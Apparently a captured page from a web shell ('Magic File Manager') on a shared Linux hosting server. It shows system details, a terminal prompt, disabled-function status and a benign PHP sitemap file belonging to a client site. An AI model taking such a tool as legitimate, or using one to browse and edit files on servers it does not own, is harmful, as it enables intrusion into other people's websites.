✨ Magic File Manager

🚀 Hostinger Optimized
🖥️ Server: LiteSpeed
💻 System: Linux indra.protondns.net 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
👤 User: bbmclients (1501)
🐘 PHP: 8.2.32
🚫 Disabled: ✨ NONE

💻 Terminal

📁 /home/bbmclients/meghaahuja.com
$

📄 sitemap.php

📁 Path: /home/bbmclients/whatsapp.strategiqconsulting.in/sitemap.php
📊 Size: 1.1 KB
🔒 Perm: 0644
📝 MIME: text/x-php
<?php
/**
 * Dynamic sitemap — served at the public URL /sitemap.xml via .htaccess.
 * Uses SITE_URL from config/site-config.php, so if the domain ever
 * changes, this file needs NO edits — just update SITE_URL once.
 */
require_once __DIR__ . '/config/site-config.php';

header('Content-Type: application/xml; charset=utf-8');

// path => priority. Add/remove pages here only — no domain, no .php.
$pages = [
    '/'                                     => '1.0',
    '/features'                             => '0.9',
    '/pricing'                              => '0.9',
    '/contact'                              => '0.8',
    '/privacy-policy'                       => '0.3',
    '/terms-and-conditions'                 => '0.3',
    '/refund-and-cancellation-policy'       => '0.3',
];

echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
echo '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($pages as $path => $priority) {
    $loc = htmlspecialchars(rtrim(SITE_URL, '/') . $path);
    echo "  <url><loc>{$loc}</loc><priority>{$priority}</priority></url>\n";
}
echo '</urlset>';
← Back📥 Raw✏️ Edit🔒 Chmod
✨ File Manager Magic ✨